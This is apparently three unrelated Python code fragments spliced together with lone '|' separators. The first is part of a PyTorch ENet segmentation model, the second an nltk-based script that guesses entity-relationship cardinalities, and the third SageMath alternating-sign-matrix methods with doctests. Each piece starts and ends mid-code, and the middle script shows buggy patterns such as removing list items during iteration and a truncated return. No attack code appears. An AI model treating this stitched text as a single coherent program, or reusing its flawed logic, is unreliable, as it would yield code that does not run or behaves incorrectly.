nn.Conv2d(
in_channels, internal_channels, kernel_size=1, bias=bias),
nn.BatchNorm2d(internal_channels), activation)
# Transposed convolution
self.ext_conv2 = nn.Sequential(
nn.ConvTranspose2d(
internal_channels,
internal_channels,
kernel_size=kernel_size,
stride=2,
padding=padding,
output_padding=1,
bias=bias), nn.BatchNorm2d(internal_channels), activation)
# 1x1 expansion convolution
self.ext_conv3 = nn.Sequential(
nn.Conv2d(
internal_channels, out_channels, kernel_size=1, bias=bias),
nn.BatchNorm2d(out_channels), activation)
self.ext_regul = nn.Dropout2d(p=dropout_prob)
# PReLU layer to apply after concatenating the branches
self.out_prelu = activation
def forward(self, x, max_indices):
# Main branch shortcut
main = self.main_conv1(x)
main = self.main_unpool1(main, max_indices)
# Extension branch
ext = self.ext_conv1(x)
ext = self.ext_conv2(ext)
ext = self.ext_conv3(ext)
ext = self.ext_regul(ext)
# Add main and extension branches
out = main + ext
return self.out_prelu(out)
class ENet(nn.Module):
"""Generate the ENet model.
Keyword arguments:
- num_classes (int): the number of classes to segment.
- encoder_relu (bool, optional): When ``True`` ReLU is used as the
activation function in the encoder blocks/layers; otherwise, PReLU
is used. Default: False.
- decoder_relu (bool, optional): When ``True`` ReLU is used as the
activation function in the decoder blocks/layers; otherwise, PReLU
is used. Default: True.
"""
def __init__(self, num_classes, encoder_relu=False, decoder_relu=True):
super(ENet,self).__init__()
self.initial_block = InitialBlock(3, 16, padding=1, relu=encoder_relu)
# Stage 1 - Encoder
self.downsample1_0 = DownsamplingBottleneck(
16,
64,
padding=1,
return_indices=True,
dropout_prob=0.01,
relu=encoder_relu)
self.regular1_1 = RegularBottleneck(
64, padding=1, dropout_prob=0.01, relu=encoder_relu)
self.regular1_2 = RegularBottleneck(
64, padding=1, dropout_prob=0.01, relu=encoder_relu)
self.regular1_3 = RegularBottleneck(
64, padding=1, dropout_prob=0.01, relu=encoder_relu)
self.regular1_4 = RegularBottleneck(
64, padding=1, dropout_prob=0.01, relu=encoder_relu)
# Stage 2 - Encoder
self.downsample2_0 = DownsamplingBottleneck(
64,
128,
padding=1,
return_indices=True,
dropout_prob=0.1,
relu=encoder_relu)
self.regular2_1 = RegularBottleneck(
128, padding=1, dropout_prob=0.1, relu=encoder_relu)
self.dilated2_2 = RegularBottleneck(
128, dilation=2, padding=2, dropout_prob=0.1, relu=encoder_relu)
self.asymmetric2_3 = RegularBottleneck(
128,
kernel_size=5,
padding=2,
asymmetric=True,
dropout_prob=0.1,
relu=encoder_relu)
self.dilated2_4 = RegularBottleneck(
128, dilation=4, padding=4, dropout_prob=0.1, relu=encoder_relu)
self.regular2_5 = RegularBottleneck(
128, padding=1, dropout_prob=0.1, relu=encoder_relu)
self.dilated2_6 = RegularBottleneck(
128, dilation=8, padding=8, dropout_prob=0.1, relu=encoder_relu)
self.asymmetric2_7 = RegularBottleneck(
128,
kernel_size=5,
asymmetric=True,
padding=2,
dropout_prob=0.1,
relu=encoder_relu)
self.dilated2_8 = RegularBottleneck(
128, dilation=16, padding=16, dropout_prob=0.1, relu=encoder_relu)
# Stage 3 - Encoder
self.regular3_0 = RegularBottleneck(
128, padding=1, dropout_prob=0.1, relu=encoder_relu)
self.dilated3_1 = RegularBottleneck(
128, dilation=2, padding=2, dropout_prob=0.1, relu=encoder_relu)
self.asymmetric3_2 = RegularBottleneck(
128,
kernel_size=5,
padding=2,
asymmetric=True,
dropout_prob=0.1,
relu=encoder_relu)
self.dilated3_3 = RegularBottleneck(
128, dilation=4, padding=4, dropout_prob=0.1, relu=encoder_relu)
self.regular3_4 = RegularBottleneck(
128, padding=1, dropout_prob=0.1, relu=encoder_relu)
self.dilated3_5 = RegularBottleneck(
128, dilation=8, padding=8, dropout_prob=0.1, relu=encoder_relu)
self.asymmetric3_6 = RegularBottleneck(
128,
kernel_size=5,
asymmetric=True,
padding=2,
dropout_prob=0.1,
relu=encoder_relu)
self.dilated3_7 = RegularBottleneck(
128, dilation=16, padding=16, dropout_prob=0.1, relu=encoder_relu)
# Stage 4 - Decoder
self.upsample4_0 = UpsamplingBottleneck(
128, 64, padding=1, dropout_prob=0.1, relu=decoder_relu)
self.regular4_1 = RegularBottleneck(
64, padding=1, dropout_prob=0.1, relu=decoder_relu)
self.regular4_2 = RegularBottleneck(
64, padding=1, dropout_prob=0.1, relu=decoder_relu)
# Stage 5 - Decoder
self.upsample5_0 = UpsamplingBottleneck(
64, 16, padding=1, dropout_prob=0.1, relu=decoder_relu)
self.regular5_1 = RegularBottleneck(
16, padding=1, dropout_prob=0.1, relu=decoder_relu)
self.transposed_conv = nn.ConvTranspose2d(
16,
num_classes,
kernel_size=3,
stride=2,
padding=1,
output_padding=1,
bias=False)
def forward(self, x):
# Initial block
x = self.initial_block(x)
# Stage 1 - Encoder
x, max_indices1_0 = self.downsample1_0(x)
x = self.regular1_1(x)
x = self.regular1_2(x)
x = self.regular1_3(x)
x = self.regular1_4(x)
# Stage 2 - Encoder
x, max_indices2_0 = self.downsample2_0(x)
x = self.regular2_1(x)
x = self.dilated2_2(x)
x | |
import re
import inflect
import nltk
from src.pre_process.common_nlp import lemmatizer, text_into_sentence
from src.identify_relationship import binary_relationship_dic_list, ternary_relationship_list, \
unary_relationship_dic_list
from src.utils.file_manipulation import get_root_of_input_xml
one_to_one_relationship_list = []
one_to_many_relationship_list = []
many_to_many_relationship_list = []
binary_relation_list = []
ternary_relation_list = []
relation_list = []
p = inflect.engine()
print(ternary_relationship_list)
# remove the duplicate of binary relationship list
def remove_duplicate_of_relationship_list_binary():
new_list = []
for dic in binary_relationship_dic_list:
member1 = dic.get('member1')
member2 = dic.get('member2')
lem_mem1 = lemmatizer.lemmatize(member1)
lem_mem2 = lemmatizer.lemmatize(member2)
index = binary_relationship_dic_list.index(dic)
for new_dic in binary_relationship_dic_list:
new_index = binary_relationship_dic_list.index(new_dic)
if index == new_index:
continue
else:
new_member1 = new_dic.get('member1')
new_member2 = new_dic.get('member2')
n_lem_mem1 = lemmatizer.lemmatize(new_member1)
n_lem_mem2 = lemmatizer.lemmatize(new_member2)
if (member1 == new_member1 and member2 == new_member2) or \
(member1 == n_lem_mem1 and member2 == n_lem_mem2) or \
(lem_mem1 == new_member1 and lem_mem2 == new_member2) or \
(member2 == new_member1 and member1 == new_member2) or \
(member2 == n_lem_mem1 and member1 == n_lem_mem2) or \
(lem_mem2 == new_member1 and lem_mem1 == new_member2) or (
lem_mem1 == new_member2 and member2 == n_lem_mem1):
tokenize_member1 = nltk.word_tokenize(member1)
tag_member1 = nltk.pos_tag(tokenize_member1)
tokenize_member2 = nltk.word_tokenize(member2)
tag_member2 = nltk.pos_tag(tokenize_member2)
new_tokenize_member1 = nltk.word_tokenize(new_member1)
new_tag_member1 = nltk.pos_tag(new_tokenize_member1)
new_tokenize_member2 = nltk.word_tokenize(new_member2)
new_tag_member2 = nltk.pos_tag(new_tokenize_member2)
if tag_member1[0][1] == 'NNS' or tag_member2[0][1] == 'NNS':
binary_relationship_dic_list.remove(new_dic)
elif new_tag_member1[0][1] == 'NNS' or new_tag_member2[0][1] == 'NNS':
binary_relationship_dic_list.remove(dic)
else:
binary_relationship_dic_list.remove(dic)
# print(relationship_dic_list)
return binary_relationship_dic_list
# find sentences match with particular binary entity list
def get_sentences_match_with_entities_binary(member1, member2, relationship):
matching_sentences_list = []
sentence_list = text_into_sentence()
lem_member1 = lemmatizer.lemmatize(member1)
lem_member2 = lemmatizer.lemmatize(member2)
new_relationship_list = relationship.split('_')
if len(new_relationship_list) > 1:
correct_relationship = new_relationship_list[1]
else:
correct_relationship = new_relationship_list[0]
relationship_lem = lemmatizer.lemmatize(correct_relationship, pos="v")
# regular expressions for find relevant sentences
regex_1 = r"" + re.escape(member1) + "(.*)" + re.escape(correct_relationship) + "(.*)" + re.escape(member2)
regex_2 = r"" + re.escape(member1) + "(.*)" + re.escape(relationship_lem) + "(.*)" + re.escape(member2)
regex_3 = r"" + re.escape(lem_member1) + "(.*)" + re.escape(correct_relationship) + "(.*)" + re.escape(member2)
regex_4 = r"" + re.escape(lem_member1) + "(.*)" + re.escape(relationship_lem) + "(.*)" + re.escape(member2)
regex_5 = r"" + re.escape(lem_member1) + "(.*)" + re.escape(correct_relationship) + "(.*)" + re.escape(lem_member2)
regex_6 = r"" + re.escape(member2) + "(.*)" + re.escape(correct_relationship) + "(.*)" + re.escape(member1)
regex_7 = r"" + re.escape(member2) + "(.*)" + re.escape(relationship_lem) + "(.*)" + re.escape(member1)
regex_8 = r"" + re.escape(lem_member2) + "(.*)" + re.escape(correct_relationship) + "(.*)" + re.escape(member1)
regex_9 = r"" + re.escape(lem_member2) + "(.*)" + re.escape(relationship_lem) + "(.*)" + re.escape(member1)
regex_10 = r"" + re.escape(lem_member2) + "(.*)" + re.escape(correct_relationship) + "(.*)" + re.escape(lem_member1)
for sentence in sentence_list:
if re.search(regex_1, sentence, re.MULTILINE | re.IGNORECASE) or re.search(regex_2, sentence,
re.MULTILINE | re.IGNORECASE) or re.search(
regex_3, sentence, re.MULTILINE | re.IGNORECASE) or re.search(regex_4, sentence,
re.MULTILINE | re.IGNORECASE) or re.search(
regex_5, sentence, re.MULTILINE | re.IGNORECASE) \
or re.search(regex_6, sentence, re.MULTILINE | re.IGNORECASE) or re.search(regex_7, sentence,
re.MULTILINE | re.IGNORECASE) or re.search(
regex_8, sentence, re.MULTILINE | re.IGNORECASE) or re.search(regex_9, sentence,
re.MULTILINE | re.IGNORECASE) or re.search(
regex_10, sentence, re.MULTILINE | re.IGNORECASE):
print(sentence)
matching_sentences_list.append(sentence)
return matching_sentences_list
def get_nouns_list(sentence):
pos_tag_list = nltk.pos_tag(sentence)
noun_list = []
# print(pos_tag_list)
for data in pos_tag_list:
if data[1] == 'NN' or data[1] == 'NNS':
noun_list.append(data[0])
# print(noun_list)
return noun_list
def find_primary_key(member):
root = get_root_of_input_xml()
lem_member = lemmatizer.lemmatize(member)
for entity_ref in root.findall('entity'):
entity = entity_ref.get('name')
if entity == member or entity == lem_member:
for attri_ref in entity_ref.findall('attribute'):
if attri_ref.get('value') == "primary_key":
return attri_ref.get('name')
def get_binary_cardinality_list():
new_relationship_dic_list_binary = remove_duplicate_of_relationship_list_binary()
for dic in new_relationship_dic_list_binary:
plural_member1 = dic.get('member1')
# print(member1)
plural_member2 = dic.get('member2')
# print(member2)
relationship = dic.get('relationship')
# print(relationship)
sentence_list = get_sentences_match_with_entities_binary(plural_member1, plural_member2, relationship)
sentence_set = list(set(sentence_list))
# print(sentence_set)
member1_primary_key = find_primary_key(plural_member1)
member2_primary_key = find_primary_key(plural_member2)
# print(member1, " primary key is : ", member1_primary_key)
# print(member2, " primary key is : ", member2_primary_key)
singular_member1 = lemmatizer.lemmatize(plural_member1)
singular_member2 = lemmatizer.lemmatize(plural_member2)
if find_cardinality_many(plural_member1, sentence_set):
if find_cardinality_many(plural_member2, sentence_set):
binary_relation_list.append({"@name": relationship, "@degree": "binary", "@type": "many_to_many",
"member1": {"@name": singular_member1, "@cardinality": "many",
"@primary_key": member1_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "many",
"@primary_key": member2_primary_key}})
elif find_cardinality_one(plural_member2, sentence_set, relationship):
binary_relation_list.append(
{"@name": relationship, "@degree": "binary", "@type": "one_to_many",
"member1": {"@name": singular_member1, "@cardinality": "many",
"@primary_key": member1_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "one",
"@primary_key": member2_primary_key}})
elif find_cardinality_one(plural_member1, sentence_set, relationship):
if find_cardinality_many(plural_member2, sentence_set):
singular_member1 = lemmatizer.lemmatize(plural_member1)
singular_member2 = lemmatizer.lemmatize(plural_member2)
binary_relation_list.append(
{"@name": relationship, "@degree": "binary", "@type": "one_to_many",
"member1": {"@name": singular_member1, "@cardinality": "one", "@primary_key": member1_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "many",
"@primary_key": member2_primary_key}})
elif find_cardinality_one(plural_member2, sentence_set, relationship):
binary_relation_list.append(
{"@name": relationship, "@degree": "binary", "@type": "one_to_one",
"member1": {"@name": singular_member1, "@cardinality": "one", "@primary_key": member1_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "one",
"@primary_key": member2_primary_key}})
# ...............................
if find_cardinality_many(plural_member1, sentence_set):
if find_cardinality_many(plural_member2, sentence_set):
many_to_many_relationship_list.append(
{'member1': plural_member1, 'member2': plural_member2, 'relationship': relationship})
elif find_cardinality_one(plural_member2, sentence_set, relationship):
one_to_many_relationship_list.append(
{'member1': plural_member1, 'member2': plural_member2, 'relationship': relationship})
elif find_cardinality_one(plural_member1, sentence_set, relationship):
if find_cardinality_many(plural_member2, sentence_set):
one_to_many_relationship_list.append(
{'member1': plural_member1, 'member2': plural_member2, 'relationship': relationship})
elif find_cardinality_one(plural_member2, sentence_set, relationship):
one_to_one_relationship_list.append(
{'member1': plural_member1, 'member2': plural_member2, 'relationship': relationship})
# print("1 2 1", one_to_one_relationship_list)
# print("1 2 M", one_to_many_relationship_list)
# print("M 2 M", many_to_many_relationship_list)
print("rel", binary_relation_list)
return binary_relation_list
def get_sentences_match_with_entities_ternary(member1, member2, member3, relation):
match_ternary_sentence_list = []
# regular expressions for find ternary relationships exist sentences
regex = r"(" + re.escape(member1) + "|" + re.escape(member2) + "|" + re.escape(member3) + ")" + "(.*)" + re.escape(
relation) + "(.*)" + "(" + re.escape(member1) + "|" + re.escape(member2) + "|" + re.escape(
member3) + ")" + "(.*)" + "(" + re.escape(member1) + "|" + re.escape(member2) + "|" + re.escape(member3) + ")"
print(regex)
sentence_list = text_into_sentence()
for sentence in sentence_list:
if re.search(regex, sentence, re.MULTILINE | re.IGNORECASE):
match_ternary_sentence_list.append(sentence)
print("*************", sentence)
return match_ternary_sentence_list
def get_ternary_cardinality_list():
for dic in ternary_relationship_list:
member1 = dic.get('member1')
member2 = dic.get('member2')
member3 = dic.get('member3')
relation = dic.get('relationship')
sentence_list = get_sentences_match_with_entities_ternary(member1, member2, member3, relation)
member1_primary_key = find_primary_key(member1)
member2_primary_key = find_primary_key(member2)
member3_primary_key = find_primary_key(member3)
singular_member1 = lemmatizer.lemmatize(member1)
singular_member2 = lemmatizer.lemmatize(member2)
singular_member3 = lemmatizer.lemmatize(member3)
if find_cardinality_many(member1, sentence_list):
if find_cardinality_many(member2, sentence_list):
if find_cardinality_many(member3, sentence_list):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_many_to_many",
"member1": {"@name": singular_member1, "@cardinality": "many",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "many",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "many",
"@primary_key": member2_primary_key}}),
elif find_cardinality_one(member3, sentence_list, relation):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_many_to_one",
"member1": {"@name": singular_member1, "@cardinality": "many",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "one",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "many",
"@primary_key": member2_primary_key}}),
elif find_cardinality_one(member2, sentence_list, relation):
if find_cardinality_many(member3, sentence_list):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_many_to_one",
"member1": {"@name": singular_member1, "@cardinality": "many",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "many",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "one",
"@primary_key": member2_primary_key}}),
elif find_cardinality_one(member3, sentence_list, relation):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_one_to_one",
"member1": {"@name": singular_member1, "@cardinality": "many",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "one",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "one",
"@primary_key": member2_primary_key}})
elif find_cardinality_one(member1, sentence_list, relation):
if find_cardinality_many(member2, sentence_list):
if find_cardinality_many(member3, sentence_list):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_many_to_one",
"member1": {"@name": singular_member1, "@cardinality": "one",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "many",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "many",
"@primary_key": member2_primary_key}}),
elif find_cardinality_one(member3, sentence_list, relation):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_one_to_one",
"member1": {"@name": singular_member1, "@cardinality": "one",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "one",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "many",
"@primary_key": member2_primary_key}})
elif find_cardinality_one(member2, sentence_list, relation):
if find_cardinality_many(member3, sentence_list):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_one_to_one",
"member1": {"@name": singular_member1, "@cardinality": "one",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "many",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "one",
"@primary_key": member2_primary_key}}),
elif find_cardinality_one(member3, sentence_list, relation):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "one_to_one_to_one",
"member1": {"@name": singular_member1, "@cardinality": "one",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "one",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "one",
"@primary_key": member2_primary_key}})
return ternary_relation_list
def get_unary_cardinality_list():
unary_cardinality_list = []
for dic in unary_relationship_dic_list:
relation = dic.get('relationship')
plural_member = dic.get("member")
member = lemmatizer.lemmatize(plural_member)
primary_key = find_primary_key(member)
unary_cardinality_list.append({"@name": relation, "@degree": "unary", "@type": "one_to_one",
"member1": {"@name": member, "@cardinality": "one",
"@primary_key": primary_key},
"member2": {"@name": member, "@cardinality": "one",
"@primary_key": primary_key}})
print(unary_cardinality_list)
return unary_cardinality_list
def find_cardinality():
binary_cardinality_list = get_binary_cardinality_list()
ternary_cardinality_list = get_ternary_cardinality_list()
unary_cardinality_list = get_unary_cardinality_list()
print("### Binary ###", binary_cardinality_list)
print("### Ternary ####", ternary_cardinality_list)
print("### Unary ####", unary_cardinality_list)
relation_list = binary_cardinality_list + ternary_cardinality_list + unary_cardinality_list
print(relation_list)
return relation_list
def find_cardinality_one(member, sentence_list, relationship):
value = False
# regular expressions for find cardinality one
RE_4_1 = r'.*((only|exactly) one|uniquely|no.* more than one)(.*)' + re.escape(member)
for line in sentence_list:
for match in re.finditer(RE_4_1, line):
value = True
return value
if not value:
tokenize_member = nltk.word_tokenize(member)
tag_member = nltk.pos_tag(tokenize_member)
if tag_member[0][1] == 'NN':
value = True
return | |
1 0]
sage: asm = A([[0, 1, 0],[1, -1, 1],[0, 1, 0]])
sage: asm.height_function()
[0 1 2 3]
[1 2 1 2]
[2 1 2 1]
[3 2 1 0]
sage: asm = A([[0, 0, 1],[1, 0, 0],[0, 1, 0]])
sage: asm.height_function()
[0 1 2 3]
[1 2 1 2]
[2 3 2 1]
[3 2 1 0]
"""
asm = self.to_matrix()
n = asm.nrows() + 1
return matrix([[i+j-2*nw_corner_sum(asm,i,j) for i in range(n)] for j in range(n)])
@combinatorial_map(name='gyration')
def gyration(self):
r"""
Return the alternating sign matrix obtained by applying the gyration
action to the height function in bijection with ``self``.
Gyration acts on height functions as follows. Go through the entries of
the matrix, first those for which the sum of the row and column indices
is even, then for those for which it is odd, and increment or decrement
the squares by 2 wherever possible such that the resulting matrix is
still a height function. Gyration was first defined in [Wieland00]_ as
an action on fully-packed loops.
REFERENCES:
.. [Wieland00] <NAME>. *A large dihedral symmetry of the set of
alternating sign matrices*. Electron. J. Combin. 7 (2000).
EXAMPLES::
sage: A = AlternatingSignMatrices(3)
sage: A([[1, 0, 0],[0, 1, 0],[0, 0, 1]]).gyration()
[0 0 1]
[0 1 0]
[1 0 0]
sage: asm = A([[0, 1, 0],[1, -1, 1],[0, 1, 0]])
sage: asm.gyration()
[1 0 0]
[0 1 0]
[0 0 1]
sage: asm = A([[0, 0, 1],[1, 0, 0],[0, 1, 0]])
sage: asm.gyration()
[0 1 0]
[0 0 1]
[1 0 0]
"""
A = self.parent()
hf = list(self.height_function())
k = len(hf) - 1
for i in range(1,k):
for j in range(1,k):
if (i+j) % 2 == 0 \
and hf[i-1][j] == hf[i+1][j] == hf[i][j+1] == hf[i][j-1]:
if hf[i][j] < hf[i+1][j]:
hf[i][j] += 2
else:
hf[i][j] -= 2
for i in range(1,k):
for j in range(1,k):
if (i+j) % 2 == 1 \
and hf[i-1][j] == hf[i+1][j] == hf[i][j+1] == hf[i][j-1]:
if hf[i][j] < hf[i+1][j]:
hf[i][j] += 2
else:
hf[i][j] -= 2
return A.from_height_function(matrix(hf))
def ASM_compatible(self, B):
r"""
Return ``True`` if ``self`` and ``B`` are compatible alternating sign
matrices in the sense of [EKLP92]_. (If ``self`` is of size `n`, ``B``
must be of size `n+1`.)
In [EKLP92]_, there is a notion of a pair of ASM's with sizes differing
by 1 being compatible, in the sense that they can be combined to encode
a tiling of the Aztec Diamond.
REFERENCES:
.. [EKLP92] <NAME>, <NAME>, <NAME>, <NAME>,
*Alternating-Sign Matrices and Domino Tilings*, Journal of Algebraic
Combinatorics, volume 1 (1992), p. 111-132.
EXAMPLES::
sage: A = AlternatingSignMatrix(matrix([[0,0,1,0],[0,1,-1,1],[1,0,0,0],[0,0,1,0]]))
sage: B = AlternatingSignMatrix(matrix([[0,0,1,0,0],[0,0,0,1,0],[1,0,0,-1,1],[0,1,0,0,0],[0,0,0,1,0]]))
sage: A.ASM_compatible(B)
True
sage: A = AlternatingSignMatrix(matrix([[0,1,0],[1,-1,1],[0,1,0]]))
sage: B = AlternatingSignMatrix(matrix([[0,0,1,0],[0,0,0,1],[1,0,0,0],[0,1,0,0]]))
sage: A.ASM_compatible(B)
False
"""
if B.parent()._n - self.parent()._n != 1:
raise ValueError("mismatched sizes")
AA = self.corner_sum_matrix()
BB = B.corner_sum_matrix()
for i in range(0, len(AA[0])):
for j in range(0, len(AA[0])):
if not (AA[i,j]>=BB[i,j] and AA[i,j]>=BB[i+1,j+1]-1 \
and AA[i,j]<=BB[i+1,j] and AA[i,j]<=BB[i,j+1]):
return False
return True
def ASM_compatible_bigger(self):
r"""
Return all ASM's compatible with ``self`` that are of size one greater
than ``self``.
Given an `n \times n` alternating sign matrix `A`, there are as many
ASM's of size `n+1` compatible with `A` as 2 raised to the power of
the number of 1's in `A` [EKLP92]_.
EXAMPLES::
sage: A = AlternatingSignMatrix(matrix([[1,0],[0,1]]))
sage: A.ASM_compatible_bigger()
[
[ 0 1 0] [1 0 0] [0 1 0] [1 0 0]
[ 1 -1 1] [0 0 1] [1 0 0] [0 1 0]
[ 0 1 0], [0 1 0], [0 0 1], [0 0 1]
]
sage: B = AlternatingSignMatrix(matrix([[0,1],[1,0]]))
sage: B.ASM_compatible_bigger()
[
[0 0 1] [0 0 1] [0 1 0] [ 0 1 0]
[0 1 0] [1 0 0] [0 0 1] [ 1 -1 1]
[1 0 0], [0 1 0], [1 0 0], [ 0 1 0]
]
"""
n = self.parent()._n + 1
M = AlternatingSignMatrices(n)
sign = []
asm = self.to_matrix()
B = matrix(n+1)
A = matrix([[2*(i+j-2*nw_corner_sum(asm,i,j))+1 for i in range(n)]
for j in range(n)])
for a in range(n+1):
B[a,0] = 2*a
B[0,a] = 2*a
B[a,n] = 2*(n-a)
B[n,a] = 2*(n-a)
for i in range(1,n):
for j in range(1,n):
if A[i-1,j-1] == A[i,j] == A[i-1,j]-2 == A[i,j-1]-2:
B[i,j] = -A[i,j]
sign.append([i,j])
else:
B[i,j] = list({A[i-1,j-1]-1,A[i-1,j-1]+3} & {A[i-1,j]-3,A[i-1,j]+1} & {A[i,j-1]-3,A[i,j-1]+1} & {A[i,j]-1,A[i,j]+3})[0]
output = [B]
for b in range(len(sign)):
N = len(output)
for c in range(N):
d = copy.copy(output[c])
output[c][sign[b][0],sign[b][1]] = -output[c][sign[b][0], sign[b][1]] + 3
d[sign[b][0],sign[b][1]] = -d[sign[b][0], sign[b][1]]-1
output.append(d)
for k in range(len(output)):
output[k] = M.from_height_function(output[k]/2)
return(output)
def ASM_compatible_smaller(self):
r"""
Return the list of all ASMs compatible with ``self`` that are of size
one smaller than ``self``.
Given an alternating sign matrix `A` of size `n`, there are as many
ASM's of size `n-1` compatible with it as 2 raised to the power of
the number of `-1`'s in `A` [EKLP92]_.
EXAMPLES::
sage: A = AlternatingSignMatrix(matrix([[0,0,1,0],[0,1,-1,1],[1,0,0,0],[0,0,1,0]]))
sage: A.ASM_compatible_smaller()
[
[0 0 1] [ 0 1 0]
[1 0 0] [ 1 -1 1]
[0 1 0], [ 0 1 0]
]
sage: B = AlternatingSignMatrix(matrix([[1,0,0],[0,0,1],[0,1,0]]))
sage: B.ASM_compatible_smaller()
[
[1 0]
[0 1]
]
"""
n = self.parent()._n
M = AlternatingSignMatrices(n)
A = matrix(n)
asm = self.to_matrix()
B = matrix([[2*(i+j-2*nw_corner_sum(asm,i,j)) for i in range(n)] for j in range(n)])
sign = []
for a in range(n):
A[a,0] = 2*a + 1
A[0,a] = 2*a + 1
A[n-1,a] = 2*(n-a) - 1
A[a,n-1] = 2*(n-a) - 1
for i in range(n-1):
for j in range(n-1):
if B[i+1,j+1] == B[i,j] == B[i,j+1]+2 == B[i+1,j]+2:
A[i,j] = -B[i,j]
sign.append([i,j])
else:
A[i,j] = list({B[i,j]+1,B[i,j]-3} & {B[i,j+1]+3,B[i,j+1]-1} & {B[i+1,j]+3,B[i+1,j]-1} & {B[i+1,j+1]+1,B[i+1,j+1]-3})[0]
output = [A]
for b in range(len(sign)):
N = len(output)
for c in range(N):
d = copy.copy(output[c])
output[c][sign[b][0],sign[b][1]] = -output[c][sign[b][0], sign[b][1]]+1
d[sign[b][0],sign[b][1]] = -d[sign[b][0], sign[b][1]]-3
output.append(d)
for k in range(0,len(output)):
output[k] = M.from_height_function((output[k]-matrix.ones(n,n))/2)
return(output)
@combinatorial_map(name='to Dyck word')
def to_dyck_word(self):
r"""
Return the Dyck word determined by the last diagonal of
the monotone triangle corresponding to ``self``.
EXAMPLES::
sage: A = AlternatingSignMatrices(3)
sage: A([[0,1,0],[1,0,0],[0,0,1]]).to_dyck_word()
[1, 1, 0, 0, 1, 0]
sage: d = A([[0,1,0],[1,-1,1],[0,1,0]]).to_dyck_word(); d
[1, 1, 0, 1, 0, 0]
sage: parent(d)
Complete Dyck words
"""
MT = self.to_monotone_triangle()
nplus = self._matrix.nrows() + 1
parkfn = [nplus - row[0] for row in list(MT) if len(row) > 0]
return NonDecreasingParkingFunction(parkfn).to_dyck_word().reverse()
def number_negative_ones(self):
"""
Return the number of entries in ``self`` equal to -1.
EXAMPLES::
sage: A = AlternatingSignMatrices(3)
sage: asm = A([[0,1,0],[1,0,0],[0,0,1]])
sage: asm.number_negative_ones()
0
sage: asm = A([[0,1,0],[1,-1,1],[0,1,0]])
sage: asm.number_negative_ones()
1
"""
a = self._matrix
return sum(1 for (i,j) in a.nonzero_positions() if a[i,j] == -1)
def is_permutation(self):
"""
Return ``True`` if ``self`` is a permutation matrix
and ``False`` otherwise.
EXAMPLES::
sage: A = AlternatingSignMatrices(3)
sage: asm = A([[0,1,0],[1,0,0],[0,0,1]])
sage: asm.is_permutation()
True
sage: asm = A([[0,1,0],[1,-1,1],[0,1,0]])
sage: asm.is_permutation()
False
"""
return self.number_negative_ones() == 0
def to_permutation(self):
"""
Return the corresponding permutation if ``self`` is a permutation
matrix.
EXAMPLES::
sage: A = AlternatingSignMatrices(3)
sage: asm = A([[0,1,0],[1,0,0],[0,0,1]])
sage: p = asm.to_permutation(); p
[2, 1, 3]
sage: parent(p)
Standard permutations
sage: asm = A([[0,1,0],[1,-1,1],[0,1,0]])
sage: asm.to_permutation()
Traceback (most recent call last):
...
ValueError: Not a permutation matrix
"""
if not self.is_permutation():
raise ValueError('Not a permutation matrix')
asm_matrix = self.to_matrix()
return Permutation([ j+1 for (i,j) in asm_matrix.nonzero_positions() ])
@combinatorial_map(name='to semistandard tableau')
def to_semistandard_tableau(self):
"""
Return the semistandard tableau corresponding the monotone triangle
corresponding to ``self``.
EXAMPLES::
sage: A = AlternatingSignMatrices(3)
sage: A([[0,0,1],[1,0,0],[0,1,0]]).to_semistandard_tableau()
[[1, 1, 3], [2, 3], [3]]
sage: t = A([[0,1,0],[1,-1,1],[0,1,0]]).to_semistandard_tableau(); t
[[1, 1, 2], [2, 3], [3]]
sage: parent(t)
Semistandard tableaux
"""
from sage.combinat.tableau import SemistandardTableau, SemistandardTableaux
mt = self.to_monotone_triangle()
ssyt = [[0]*(len(mt) - j) for j in range(len(mt))]
for i in range(len(mt)):
for j in range(len(mt[i])):
ssyt[i][j] = mt[j][-(i+1)]
return SemistandardTableau(ssyt)
def |